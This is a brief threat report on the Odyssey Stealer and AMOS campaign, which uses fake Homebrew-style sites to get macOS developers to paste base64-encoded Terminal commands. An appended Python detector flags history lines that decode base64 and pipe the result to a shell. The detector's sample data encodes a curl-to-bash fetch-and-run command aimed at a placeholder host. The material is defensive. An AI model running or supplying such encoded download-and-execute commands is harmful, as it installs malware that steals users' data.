Odyssey Stealer & AMOS Hit macOS Developers with Fake Homebrew Sites
released on 2025-10-16 @ 05:53:01 PM
A sophisticated campaign targeting macOS developers has been uncovered. It uses fake websites impersonating trusted platforms such as Homebrew, TradingView, and LogMeIn to distribute the Odyssey Stealer and AMOS malware. The attackers rely on social engineering, prompting users to paste base64-encoded commands into Terminal; once run, these commands download malicious payloads. Over 85 phishing domains were identified, linked through shared SSL certificates and infrastructure. The campaign's infrastructure includes long-standing IP addresses showing multi-year activity. The malware attempts privilege escalation, performs anti-analysis checks, and disrupts backup services. This coordinated operation demonstrates the attackers' ability to adapt tactics and maintain persistence in the macOS ecosystem.
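A triage heuristic for the paste-into-Terminal lure described above, added here as an example and not taken from the original report: it flags shell history or process command lines that decode base64 and hand the result to an interpreter, then decodes the blob so an analyst can see what would have run. The sample lines, the `.invalid` host name and all function names are constructed for illustration.

```python
import base64
import binascii
import re

# A base64 run long enough to hide a command (18+ decoded bytes).
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Decode flags accepted by the macOS and GNU base64 utilities.
DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
# Decoded output handed to a shell: pipe, command substitution, or eval.
TO_SHELL = re.compile(r'\|\s*(?:/bin/)?(?:ba|z)?sh\b|\b(?:ba|z)?sh\s+-c\s+"?\$\(|\beval\b')
# A network fetch inside the decoded text.
FETCH = re.compile(r"\b(?:curl|wget)\b[^|;&]*?(https?://\S+)")


def _b64(cmd):
    return base64.b64encode(cmd.encode()).decode()


# Constructed sample history; the host name is a reserved placeholder.
SAMPLE = [
    "brew install wget",
    'echo "%s" | base64 -d | bash'
    % _b64("curl -fsSL https://downloads.example.invalid/install.sh | bash"),
    "base64 -d report.b64 > report.pdf",  # decodes to a file, never executed
    'bash -c "$(echo %s | base64 -D)"' % _b64("echo hello from a build script"),
]


def decode_blob(blob):
    """Return the decoded text of a base64 blob, or None if it is not text."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def scan(lines):
    """Flag lines that decode base64 and execute the result in a shell."""
    findings = []
    for n, line in enumerate(lines, 1):
        if not (DECODE.search(line) and TO_SHELL.search(line)):
            continue
        for blob in B64_BLOB.findall(line):
            text = decode_blob(blob)
            if text is not None:
                urls = FETCH.findall(text)
                findings.append({"line": n, "decoded": text, "urls": urls,
                                 "severity": "high" if urls else "review"})
    return findings
```

A "high" finding means the decoded command fetches remote content; "review" means encoded execution without a visible fetch, which still warrants a look at the decoded text.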